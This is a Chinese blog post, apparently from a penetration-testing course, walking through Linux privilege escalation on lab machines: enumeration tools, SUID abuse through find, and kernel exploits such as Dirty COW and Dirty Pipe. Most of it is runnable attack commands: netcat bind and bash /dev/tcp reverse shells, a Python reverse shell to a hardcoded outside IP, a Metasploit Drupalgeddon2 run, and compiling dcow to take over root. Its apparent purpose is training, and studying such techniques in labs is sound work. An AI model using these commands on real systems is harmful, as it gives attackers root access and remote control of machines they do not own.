首页 > 系统相关 >第103天:权限提升-Linux系统&辅助项目&脏牛&Dirty&内核漏洞&SUID&GUID

第103天:权限提升-Linux系统&辅助项目&脏牛&Dirty&内核漏洞&SUID&GUID

时间:2024-10-12 21:10:20浏览次数:1  
标签:SUID 探针 提权 脏牛 内核 https Linux GUID 漏洞

知识点梳理

#知识点:

1、Linux提权辅助项目-探针&漏扫
2、Linux提权-配置SUID&内核CVE

#系列内容:

内核,数据库,第三方服务,SUID&GUID,定时任务,环境变量,SUDO,权限不当等
脏牛漏洞(CVE-2016-5195)
Dirty Pipe(CVE-2022-0847)
SUDO(CVE-2021-3156)
Polkit(CVE-2021-4034)

案例演示

Linux-辅助项目配置安全&内核漏洞-探针漏扫

Linux-配置安全SUID提权探针&利用-云服务器

Linux-内核漏洞本地用户提权-探针&利用-墨者

Linux-内核漏洞Web用户提权-探针&利用-脏牛

Linux-内核漏洞本地用户提权-探针&利用-DirtyPipe

#Linux-辅助项目配置安全&内核漏洞-探针&漏扫

https://github.com/liamg/traitor
https://github.com/AlessandroZ/BeRoot
https://github.com/rebootuser/LinEnum
https://github.com/mzet-/linux-exploit-suggester
https://github.com/sleventyeleven/linuxprivchecker
https://github.com/jondonas/linux-exploit-suggester-2

一个综合类探针:traitor
一个自动化提权:BeRoot(gtfobins&lolbas)
两个信息收集:LinEnum linuxprivchecker
两个漏洞探针:linux-exploit-suggester&2

二进制文件提权查询:
Linux:https://gtfobins.github.io/
Windows:https://lolbas-project.github.io/

#Linux-配置安全SUID提权-探针&利用-云服务器

SUID概念:当一个可执行文件被设置了SUID权限后,当普通用户执行时,该程序将以文件所有者(通常是root管理员)的权限运行。
漏洞成因:chmod u+s给予suid(删除suid使用u-s),
提权过程:探针是否有SUID(手工或脚本)-特定SUID利用-利用吃瓜-GG

手工命令探针安全:
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;
(实测手工比脚本方便快捷)

脚本项目探针安全:
LinEnum.sh、traitor、linuxprivchecker
(实测LinEnum.sh不错,traitor不太行,linuxprivchecker一般,但需要打包上传且要对方有python编译器)

参考利用:
https://pentestlab.blog/2017/09/25/suid-executables/ (推荐)
https://gtfobins.github.io/

touch xiaodi
find xiaodi -exec whoami ;

利用NC正向反弹:
find xiaodi -exec netcat -lvp 5555 -e /bin/sh ;
netcat xx.xx.xx.xx 5555

利用NC反向反弹:
find xiaodi -exec bash -i >& /dev/tcp/ip/port 0>&1 ;
但首先需要在kali上使用nc监听端口:
nc -lvp 7777

利用Python反弹:
find xiaodi -exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.94.236.117",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ;
nc -lvp 7777

各种反弹Shell命令在线生成平台:
https://forum.ywhack.com/shell.php

#Linux-内核漏洞本地用户提权-探针&利用-Mozhe

提权过程:连接-获取可利用漏洞-下载或上传EXP-编译EXP-给权限执行-GG
探针项目:BeRoot、linux-exploit-suggester、linux-exploit-suggester2
(实测BeRoot需要python环境,linux-exploit-suggester还不错)
gcc 45010.c -o exp
chmod +x exp
./exp
id

#Linux-内核漏洞Web用户提权-探针&利用-脏牛dcow

内核提权整个过程:(linux-exploit-suggester获取信息)
vulnhub靶机-探针目标-CMS漏洞利用-脚本探针提权漏洞-利用内核提权-GG
内核漏洞提权过程:寻可用-下exp-上/tmp-编译exp-执行(无权限用chmod)
nmap 192.168.46.0/24
nmap -p1-65535 192.168.46.144
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set rhost 192.168.46.144
set rport 1898
run
meterpreter > upload /root/dcow.cpp /tmp/dcow.cpp
meterpreter > shell
python -c 'import pty; pty.spawn("/bin/bash")' //在交互式终端中生成一个更强大的 Bash shell
www-data@lampiao:/var/www/html$ cd /tmp
www-data@lampiao:/tmp$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
www-data@lampiao:/tmp$ ./dcow
www-data@lampiao:/tmp$ su root
Running ...
Received su prompt (Password: )
Root password is: dirtyCowFun
Enjoy!

标签:SUID,探针,提权,脏牛,内核,https,Linux,GUID,漏洞
From: https://www.cnblogs.com/dummy6acker/p/18461500

相关文章

  • Linux下权限设置之suid、sgid、sticky
    linux文件普通权限rwxLinux中文件的普通权限一般为:rwx,对应与数字表示:421,除此之外,文件还有三种特殊权限,就这是我们本节要讲的三种特殊文件权限。linux文件特殊权限suid、sgid、stickylinux文件的三种特殊权限分别是:suid权限、sgid权限、sticky权限;其中suid权限作用于文件属主,sgid......
  • CF589H Tourist Guide
    昨晚码敲完了没保存,导致还原卡直接把我码肘没了。。。气死了只能重新敲了一遍。题面TouristGuide分析考虑每一个联通块分开处理。先将每一个联通块变为生成树,任意生成方式皆可。对于每一个联通块,一定可以构造一种组合方法,使得该联通块中最多只有一个关键点无法被选择。并......
  • [GAN][图片异常检测]Unsupervised Anomaly Detection withGenerative Adversarial Net
    论文背景与目标:    本文旨在将GAN运用到图片异常检测中,并取得了一定的效果,该模型不仅能够检测已知的异常,还能够发现未曾标注的新异常。提出了结合GAN的生成和判别功能的新型异常评分方法。在无监督的前提下实现了异常图像的分割。通过利用GAN的潜在空间,提出了新的......
  • 科普向:USB设备的PID、VID和GUID分别代表什么
    USB设备的PID、VID和GUID分别代表什么在USB设备中,PID、VID和GUID是用于标识和管理设备的重要标识符。以下是它们的具体含义:1.VID(VendorID)VID代表供应商ID,它是由USB实现者论坛(USB-IF)分配给每个USB设备制造商的唯一标识符。每个制造商在制造USB设备时都......
  • (论文解读)Visual-Language Prompt Tuning with Knowledge-guided Context Optimization
    Comment:acceptedbyCVPR2023基于知识引导上下文优化的视觉语言提示学习摘要提示调优是利用任务相关的可学习标记将预训练的视觉语言模型(VLM)适应下游任务的有效方法。基于CoOp的代表性的工作将可学习的文本token与类别token相结合,来获得特定的文本知识。然而,这些特定的文......
  • c++ string 转换成 guid
      在C++中,将一个字符串转换为GUID(GloballyUniqueIdentifier)可以通过以下方法实现。GUID通常是128位(16字节)的标识符,以标准格式表示,例如:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx。在C++中,常用的库之一是WindowsAPI,它提供了处理GUID的相关功能。这里是一个示例代码,将字符串转换......
  • HTB-Oopsie(越权漏洞,suid提权,js接口查询插件)
    前言各位师傅大家好,我是qmx_07,今天给大家讲解Oopsie靶机渗透过程信息搜集服务器开放了22SSH端口和HTTP80端口FindSomething插件介绍:帮助寻找网站的js接口,辅助渗透通过js接口查找,发现目录/cdn-cgi/login登录接口通过游客模式登录越权登录访问uploads文件......
  • Procrastination: A Scientific Guide on How to Stop Procrastinating
    Procrastinationisachallengewehaveallfacedatonepointoranother.Foraslongashumanshavebeenaround,wehavebeenstrugglingwithdelaying,avoiding,andprocrastinatingonissuesthatmattertous.Duringourmoreproductivemoments,whenwe......
  • Neural Magic发布GuideLLM:评估和优化大型语言模型(LLM)部署的强大工具
    大型语言模型(LLMs)的部署和优化已成为各种应用的关键。NeuralMagic推出了GuideLLM,以应对对高效、可扩展且具有成本效益的LLM部署日益增长的需求。这款强大的开源工具旨在评估和优化LLM的部署,以确保它们在满足现实中的推理需求的同时,具有高性能和最小的资源消耗。GuideLLM概述......
  • (多模态)MedM2G: Unifying Medical Multi-Modal Generation via CrossGuided Diffusion
    1.摘要医学生成模型以其高质量的样本生成能力而闻名,加速了医学应用的快速增长。然而,目前的研究主要集中在针对不同医疗任务的单独医学生成模型上,受限于医学多模态知识的不足,制约了医学的综合诊断。在本文中,我们提出MedM2G,即医学多模态生成框架,其关键创新是在统一模型内对齐......